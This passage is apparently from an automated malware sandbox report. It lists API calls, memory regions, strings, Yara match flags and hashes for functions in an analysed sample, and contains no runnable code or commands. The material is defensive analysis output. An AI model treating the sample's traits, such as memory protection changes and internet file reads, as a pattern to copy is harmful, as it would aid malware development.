                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: __alloca_probe_16__freea$Info
                                                    • String ID:
                                                    • API String ID: 2330168043-0
                                                    • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                    • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                    • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                    • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16
                                                    • String ID:
                                                    • API String ID: 3509577899-0
                                                    • Opcode ID: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                                    • Instruction ID: f2b5e5426fedb8598fc76fae10d55257e5a04a8e30a18f0e2ceb2f17756af3bc
                                                    • Opcode Fuzzy Hash: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                                    • Instruction Fuzzy Hash: 5C51F576600206ABFF605F658C81EBB3BABDF44754F1901A8FE05D7140E73AFD11A6A0
                                                    APIs
                                                    • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                    • __alloca_probe_16.LIBCMT ref: 1000B101
                                                    • __freea.LIBCMT ref: 1000B16D
                                                      • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                    • __freea.LIBCMT ref: 1000B176
                                                    • __freea.LIBCMT ref: 1000B199
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1423051803-0
                                                    • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                    • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                    • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                    • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                    APIs
                                                    • __alloca_probe_16.LIBCMT ref: 00413724
                                                    • __alloca_probe_16.LIBCMT ref: 004137EA
                                                    • __freea.LIBCMT ref: 00413856
                                                      • Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                    • __freea.LIBCMT ref: 0041385F
                                                    • __freea.LIBCMT ref: 00413882
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1423051803-0
                                                    • Opcode ID: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                    • Instruction ID: 356f55c8d52bf468307c9bd9aee3ed648f54657124d7a114e97aef17e3d97ec8
                                                    • Opcode Fuzzy Hash: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                                    • Instruction Fuzzy Hash: 6151D3B2600206ABEF20AF55CC41EEB36E9EF44755F15412EFD18E7290D738DE9186A8
                                                    APIs
                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B42C5F
                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B42C74
                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B42C82
                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B42C9D
                                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B42CBC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                    • String ID:
                                                    • API String ID: 2509773233-0
                                                    • Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                    • Instruction ID: 8e0c3b542556c10dfa7e3922ea7325ac6b0ed9a3e589e4877d3c30077f841730
                                                    • Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                    • Instruction Fuzzy Hash: 71310471B00014AFDB18DF68DC45FBAB768EF88704F0541E9F905EB252DB31A912EB94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                    • String ID:
                                                    • API String ID: 3136044242-0
                                                    • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                    • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                    • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                    • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                    • Instruction ID: d3862564c1c448d0eb3923a45cdf49f18f6833f21556cac3654b71cf7d9cec13
                                                    • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                    • Instruction Fuzzy Hash: F6F06872701100A785A4EF5DEC86C1677DBAB00720BA48819F544D7503CB3DF9529655
                                                    APIs
                                                    • _free.LIBCMT ref: 04B57260
                                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                    • _free.LIBCMT ref: 04B57272
                                                    • _free.LIBCMT ref: 04B57284
                                                    • _free.LIBCMT ref: 04B57296
                                                    • _free.LIBCMT ref: 04B572A8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                    • Instruction ID: 483566ea0ef53b89664ed2dd7fd9b40260e4331b71de85a4830a2d39d41bba32
                                                    • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                    • Instruction Fuzzy Hash: CEF04432B142146BCA34DB58F586E16B3DDEB01720BA40885FC28D7560CF25FC914A54
                                                    APIs
                                                    • _free.LIBCMT ref: 1000C536
                                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                    • _free.LIBCMT ref: 1000C548
                                                    • _free.LIBCMT ref: 1000C55A
                                                    • _free.LIBCMT ref: 1000C56C
                                                    • _free.LIBCMT ref: 1000C57E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                    • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                                    • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                    • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                                    APIs
                                                    • _free.LIBCMT ref: 00416FF9
                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                    • _free.LIBCMT ref: 0041700B
                                                    • _free.LIBCMT ref: 0041701D
                                                    • _free.LIBCMT ref: 0041702F
                                                    • _free.LIBCMT ref: 00417041
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                    • Instruction ID: 1bbc7c59558bdb80d40cd5d769ae83ba842cf1fe79b15496f27bd1d3c69b9f62
                                                    • Opcode Fuzzy Hash: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                    • Instruction Fuzzy Hash: 2AF04432705240678534DB5DE486D967BE9AF44760758481BF508D7A12D73CFCD0465C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O*$rB$rB
                                                    • API String ID: 0-546290271
                                                    • Opcode ID: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                    • Instruction ID: b76375a6d1ccb6514fecc0a490c549058fda5aaf315fa6300b765a8ff46226aa
                                                    • Opcode Fuzzy Hash: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                    • Instruction Fuzzy Hash: 52121771D002489BEB18EBB8DC54BEDB7B4EF95308F1080E8E54567191EF34BA49EB61
                                                    APIs
                                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                    • __Init_thread_footer.LIBCMT ref: 04B451B2
                                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                    • Sleep.KERNEL32(000007D0), ref: 04B4552A
                                                    • Sleep.KERNEL32(000007D0), ref: 04B45544
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                    • String ID: updateSW
                                                    • API String ID: 500923978-2484434887
                                                    • Opcode ID: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                    • Instruction ID: c6fd249a583e1bd64c1d0d5cf636f5f3d56e5160116afebae93ef7f49f3738a4
                                                    • Opcode Fuzzy Hash: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                    • Instruction Fuzzy Hash: CED1D4B1A005649BEB38DB28CC887ADB771EFC1308F1441E9D9096B295DB75AEC4DB41
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID: *?
                                                    • API String ID: 269201875-2564092906
                                                    • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                    • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                                    • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                    • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                                    • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                    • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                                    • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                    • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                    • Instruction ID: 77a643673ec7d88cd29a2edf076a5074e238e4b33c83bd47411dea4c6174af87
                                                    • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                    • Instruction Fuzzy Hash: 3CB12831A00285DFEB55CF29CC507BEBBF6EF45350F1C456AD6459B241EA39AE02CB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                    • Instruction ID: 02a552d982c9984a1b1bac77fe61ae331d2408373eee9c2b43d7e4130cbb2361
                                                    • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                    • Instruction Fuzzy Hash: 1FB11532A062869FEB19CF28C8807BEFBF5EF45340F1445E9DC549B2A1D634A902CF60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    • Opcode ID: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                    • Instruction ID: 6012ccbf35aa319517377e765832e55e269021952583a9b626e33c473f35baf7
                                                    • Opcode Fuzzy Hash: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                    • Instruction Fuzzy Hash: A6B13571A002459FDB25CF68CA817EEBBE1EF55340F14816BD845EB341D2BC9992CB68
                                                    APIs
                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B41B6C
                                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B41B8B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileInternet$PointerRead
                                                    • String ID:
                                                    • API String ID: 3197321146-0
                                                    • Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                    • Instruction ID: 38f03f2f50ce7fb5e1d488fa682dcfb14914d823c11f0e815f3cc0a36ff6d32e
                                                    • Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                    • Instruction Fuzzy Hash: 96C16EB0A002189FEB25CF28CD88BEAB7B5FF89704F1045D8E509A7690D775BA85CF50
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                    • Instruction ID: 2592838cd25b8c71b616a3209bd307f9368e49ef6110a60e681fa7179048d052
                                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                    • Instruction Fuzzy Hash: FD51C0B2A05202EFEB299F56D840BBA77A7EF44314F14412DE80597291E737FA81D790
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                    • Instruction ID: f0bc5704de4a8aec523d52425b52e3bee8f4acdc25eac687b52e62684058ebf2
                                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                    • Instruction Fuzzy Hash: CE51E372A08602AFEF298F10D880B7A7BA4FF84304F1445ADDA4597A90E731F951FB91
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                    • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                    • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                    • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                    • Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
                                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                    • Instruction Fuzzy Hash: E151D1B1600303AFDB299F15D841BABB3A4EF44314F14413FE801A76D2E739AC65D79A
                                                    APIs
                                                      • Part of subcall function 04B4FE6F: _free.LIBCMT ref: 04B4FE7D
                                                      • Part of subcall function 04B5375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B588CA,?,?,?,00000000,?,04B58639,0000FDE9,00000000,?), ref: 04B53800
                                                    • GetLastError.KERNEL32 ref: 04B55D18
                                                    • __dosmaperr.LIBCMT ref: 04B55D1F
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 04B55D5E
                                                    • __dosmaperr.LIBCMT ref: 04B55D65
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                    • String ID:
                                                    • API String ID: 167067550-0
                                                    • Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                    • Instruction ID: 08308f1979cd23a2967e901f9ccb00e7a8daaa7dba466098c2f7cb83c5f6d14b
                                                    • Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                    • Instruction Fuzzy Hash: 9821D872600605BFEB30AF65CC84F6BF7ACEF402697004598ED29975A0E731FD009750
                                                    APIs
                                                      • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                                      • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                    • GetLastError.KERNEL32 ref: 10007C36
                                                    • __dosmaperr.LIBCMT ref: 10007C3D
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                    • __dosmaperr.LIBCMT ref: 10007C83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                    • String ID:
                                                    • API String ID: 167067550-0
                                                    • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                    • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                    • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
